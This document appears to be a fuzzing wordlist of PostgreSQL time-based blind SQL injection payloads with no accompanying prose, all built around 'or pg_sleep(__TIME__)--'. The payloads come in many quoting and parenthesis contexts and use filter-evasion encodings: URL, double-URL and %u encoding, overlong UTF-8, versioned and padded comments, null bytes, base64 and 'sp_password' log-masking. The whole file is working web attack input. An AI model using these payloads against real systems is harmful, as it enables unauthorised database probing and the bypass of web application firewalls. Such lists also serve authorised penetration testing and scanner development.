1) or pg_sleep(__TIME__)--

1) /*!30957or pg_sleep(__TIME__)*/--

1) /*!00000or pg_sleep(__TIME__)*/--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%1%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--
 and '0having'='0having'
1) or pg_sleep(__TIME__)--
-- sp_password
1)/**/or/**/pg_sleep(__TIME__)--

1)--IsxINNkAv%0Aor--AieNJPc%0Apg_sleep(__TIME__)----LsgLrTmvDl%0A
1)%23TgdzaKh%0Aor%23ouelrslevBN%0Apg_sleep(__TIME__)--%23FpJTWXgZsOp%0A
1)%23kSOLzAZBIh%0Aor%23aoOfnzkgzcwy%0Apg_sleep(__TIME__)--%23lgwSAxToAEDp%0A
1)%06or%0Apg_sleep(__TIME__)--

1)%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
1)%0Dor%09pg_sleep(__TIME__)--

1)--%0Aor--%0Apg_sleep(__TIME__)----%0A
1)+or+pg_sleep(__TIME__)--

1)%0Dor%09pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--
%00
Iikgb3IgcGdfc2xlZXAoX19USU1FX18pLS0K
") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

%2522%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%22%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0022%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") /*!30889or pg_sleep(__TIME__)*/--

") /*!00000or pg_sleep(__TIME__)*/--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

%C0%AA%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%"%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--
 and '0having'='0having'
") or pg_sleep(__TIME__)--
-- sp_password
")/**/or/**/pg_sleep(__TIME__)--

")--JxaPqSmS%0Aor--rPhNoLrAgYeH%0Apg_sleep(__TIME__)----GGCexdNrOcP%0A
")%23VkKDCF%0Aor%23dsIEBarqWGkW%0Apg_sleep(__TIME__)--%23oDGPXgtW%0A
")%23rvlFUQV%0Aor%23qgbuuRRL%0Apg_sleep(__TIME__)--%23eHNIlBw%0A
")%05or%04pg_sleep(__TIME__)--

")%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
")%0Cor%0Apg_sleep(__TIME__)--

")--%0Aor--%0Apg_sleep(__TIME__)----%0A
")+or+pg_sleep(__TIME__)--

")%0Dor%0Apg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

") or pg_sleep(__TIME__)--

%EF%BC%87) or pg_sleep(__TIME__)--

%00%27) or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--
%00
Jykgb3IgcGdfc2xlZXAoX19USU1FX18pLS0K
') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

%2527%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%27%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0027%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') /*!30355or pg_sleep(__TIME__)*/--

') /*!00000or pg_sleep(__TIME__)*/--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

%C0%AF%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%'%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--
 and '0having'='0having'
') or pg_sleep(__TIME__)--
-- sp_password
')/**/or/**/pg_sleep(__TIME__)--

')--smtnUsO%0Aor--KxLZyEWHMnsx%0Apg_sleep(__TIME__)----CzDhlWQ%0A
')%23mWTDSYlL%0Aor%23VcDktin%0Apg_sleep(__TIME__)--%23vLTRGaR%0A
')%23JMclVXXHKHs%0Aor%23KXXwxFfK%0Apg_sleep(__TIME__)--%23hKnRkEUaOrZG%0A
')%08or%0Epg_sleep(__TIME__)--

')%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
')%0Bor%09pg_sleep(__TIME__)--

')--%0Aor--%0Apg_sleep(__TIME__)----%0A
')+or+pg_sleep(__TIME__)--

')%09or%0Apg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

%bf%27) or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

') or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--
%00
MSkpIG9yIHBnX3NsZWVwKF9fVElNRV9fKS0tCg==
1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

%2531%2529%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%31%29%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0031%u0029%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) /*!30385or pg_sleep(__TIME__)*/--

1)) /*!00000or pg_sleep(__TIME__)*/--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1%C0%AB%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%1%)%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--
 and '0having'='0having'
1)) or pg_sleep(__TIME__)--
-- sp_password
1))/**/or/**/pg_sleep(__TIME__)--

1))--XcCPlM%0Aor--deBuAAarIzKj%0Apg_sleep(__TIME__)----xknyfLiIh%0A
1))%23trsDys%0Aor%23TWXkyPByb%0Apg_sleep(__TIME__)--%23pVmyxxJr%0A
1))%23DhSWaTcCx%0Aor%23evlMFuqwewD%0Apg_sleep(__TIME__)--%23gdtnNZNbJO%0A
1))%06or%03pg_sleep(__TIME__)--

1))%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
1))%09or%0Cpg_sleep(__TIME__)--

1))--%0Aor--%0Apg_sleep(__TIME__)----%0A
1))+or+pg_sleep(__TIME__)--

1))%0Aor%0Apg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

1)) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--
%00
IikpIG9yIHBnX3NsZWVwKF9fVElNRV9fKS0tCg==
")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

%2522%2529%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%22%29%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0022%u0029%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) /*!30655or pg_sleep(__TIME__)*/--

")) /*!00000or pg_sleep(__TIME__)*/--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

%C0%AA%C0%AB%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%"%)%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--
 and '0having'='0having'
")) or pg_sleep(__TIME__)--
-- sp_password
"))/**/or/**/pg_sleep(__TIME__)--

"))--bfiXCKu%0Aor--FcQNVAh%0Apg_sleep(__TIME__)----aPoYsxaGPC%0A
"))%23TsJxcIkCywcQ%0Aor%23QPZAlUQcrT%0Apg_sleep(__TIME__)--%23BicuzpCl%0A
"))%23vDEavlZzLJma%0Aor%23JviJFXvbXH%0Apg_sleep(__TIME__)--%23sCNETiUBtV%0A
"))%0Aor%05pg_sleep(__TIME__)--

"))%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
"))%0Bor%0Apg_sleep(__TIME__)--

"))--%0Aor--%0Apg_sleep(__TIME__)----%0A
"))+or+pg_sleep(__TIME__)--

"))%09or%0Apg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

")) or pg_sleep(__TIME__)--

%EF%BC%87)) or pg_sleep(__TIME__)--

%00%27)) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--
%00
JykpIG9yIHBnX3NsZWVwKF9fVElNRV9fKS0tCg==
')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

%2527%2529%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%27%29%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0027%u0029%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) /*!30979or pg_sleep(__TIME__)*/--

')) /*!00000or pg_sleep(__TIME__)*/--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

%C0%AF%C0%AB%C0%AB%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%'%)%) %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--
 and '0having'='0having'
')) or pg_sleep(__TIME__)--
-- sp_password
'))/**/or/**/pg_sleep(__TIME__)--

'))--vIJhsSY%0Aor--beZMqllbXNk%0Apg_sleep(__TIME__)----jfdZizezhe%0A
'))%23RcYLyr%0Aor%23OFJVJLQka%0Apg_sleep(__TIME__)--%23KXwJxeesc%0A
'))%23FZvtjbqRDfu%0Aor%23JarMmYXK%0Apg_sleep(__TIME__)--%23dsAbfUy%0A
'))%09or%02pg_sleep(__TIME__)--

'))%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
'))%0Cor%0Cpg_sleep(__TIME__)--

'))--%0Aor--%0Apg_sleep(__TIME__)----%0A
'))+or+pg_sleep(__TIME__)--

'))%0Aor%0Cpg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

%bf%27)) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

')) or pg_sleep(__TIME__)--

